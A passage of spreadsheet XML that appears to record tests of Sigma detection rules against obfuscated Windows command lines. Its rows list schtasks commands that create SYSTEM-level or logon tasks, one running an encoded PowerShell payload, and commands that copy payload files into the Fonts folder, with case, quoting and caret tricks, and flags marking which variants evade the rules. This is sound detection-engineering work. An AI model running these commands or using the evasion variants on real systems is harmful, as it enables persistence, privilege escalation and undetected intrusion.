      <c r="J295" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K295" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="n"/>
      <c r="B296" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C296" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D296" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E296" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnD "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H296" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I296" s="36" t="n"/>
      <c r="J296" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K296" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="297" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="n"/>
      <c r="B297" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C297" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D297" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E297" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H297" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I297" s="36" t="n"/>
      <c r="J297" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K297" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="43" t="n"/>
      <c r="B298" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C298" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D298" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E298" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "SystemTask1" /TR "cmd.exe" /SC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G298" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J298" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K298" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="n"/>
      <c r="B299" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C299" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D299" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E299" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "SystemTask1" /tr "cmd.exe" /sC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G299" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J299" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K299" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="n"/>
      <c r="B300" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C300" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D300" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E300" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /TN "SystemTask1" -"TR" "cmd.exe" /sC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G300" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I300" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J300" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K300" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="n"/>
      <c r="B301" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C301" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D301" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E301" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "SystemTask1" /"TR" "cmd.exe" /SC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G301" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J301" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K301" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="n"/>
      <c r="B302" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C302" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D302" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E302" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create -"TN" "SystemTask1" /TR "cmd.exe" -"SC" ONSTART -"RU" "S-1-5-18"</t>
        </is>
      </c>
      <c r="F302" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G302" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I302" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J302" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K302" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="n"/>
      <c r="B303" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C303" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D303" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E303" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /TN "SystemTask1" /TR "cmd.exe" -"SC" ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F303" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G303" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J303" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K303" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="n"/>
      <c r="B304" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C304" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D304" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E304" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATE /tN "SystemTask1" /TR "cmd.exe" /Sc ONSTART /rU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F304" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G304" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J304" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K304" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="n"/>
      <c r="B305" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C305" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D305" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E305" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /Tn "SystemTask1" /"TR" "cmd.exe" /SC ONSTART /Ru "S-1-5-18"</t>
        </is>
      </c>
      <c r="F305" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G305" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J305" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K305" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="n"/>
      <c r="B306" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C306" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D306" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E306" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATe /TN "SystemTask1" -"TR" "cmd.exe" /Sc ONSTART /"RU" "S-1-5-18"</t>
        </is>
      </c>
      <c r="F306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G306" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J306" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K306" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="307" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="n"/>
      <c r="B307" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C307" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D307" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E307" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CreatE /TN "SystemTask1" /TR "cmd.exe" /sc ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G307" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I307" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J307" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K307" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="n"/>
      <c r="B308" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C308" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D308" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E308" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEaTe /tn "SystemTask1" -"TR" "cmd.exe" -"SC" ONSTART -"RU" "S-1-5-18"</t>
        </is>
      </c>
      <c r="F308" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G308" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I308" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J308" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K308" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="309" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="n"/>
      <c r="B309" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C309" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D309" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E309" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /TN "SystemTask3" /"tr" "cmd.exe" -"sc" daily -"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I309" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J309" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K309" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="n"/>
      <c r="B310" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C310" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D310" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E310" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /Tn "SystemTask3" /tr "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I310" s="36" t="n"/>
      <c r="J310" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K310" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="311" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="n"/>
      <c r="B311" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C311" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D311" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E311" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SystemTask3" /"tr" "cmd.exe" -"sc" daily -"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I311" s="36" t="n"/>
      <c r="J311" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K311" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="n"/>
      <c r="B312" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C312" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D312" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E312" s="36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F312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H312" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I312" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J312" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K312" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="n"/>
      <c r="B313" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C313" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D313" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E313" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SystemTask3" /tr "cmd.exe" -"sc" daily /"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I313" s="36" t="n"/>
      <c r="J313" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K313" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="n"/>
      <c r="B314" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C314" s="43" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D314" s="43" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E314" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "SystemTask3" /"tr" "cmd.exe" -"sc" daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F314" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G314" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I314" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J314" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K314" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="315" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="n"/>
      <c r="B315" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C315" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D315" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E315" s="36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F315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I315" s="43" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation (f2c64357-b1d2-41b7-849f-34d2682c0fad); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J315" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K315" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="316" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="43" t="n"/>
      <c r="B316" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C316" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D316" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E316" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tn "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /f</t>
        </is>
      </c>
      <c r="F316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I316" s="4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316" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K316" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="317" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="n"/>
      <c r="B317" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C317" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D317" s="36" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E317" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /tn "BypassTask" -"TR" "powershell.exe -ENCodeDcOMMAND aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F317" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G317" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I317" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J317" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K317" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="36" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B318" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C318" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D318" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E318" s="36" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.dll %windir%\Fonts\</t>
        </is>
      </c>
      <c r="F318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I318" s="36" t="n"/>
      <c r="J318" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K318" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="319" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="36" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B319" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C319" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D319" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E319" s="36" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I319" s="36" t="n"/>
      <c r="J319" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K319" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="320" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="36" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B320" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C320" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D320" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E320" s="36" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I320" s="36" t="n"/>
      <c r="J320" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K320" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="321" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="36" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B321" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C321" s="36" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D321" s="36" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E321" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F321" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H321" s="36" t="b">
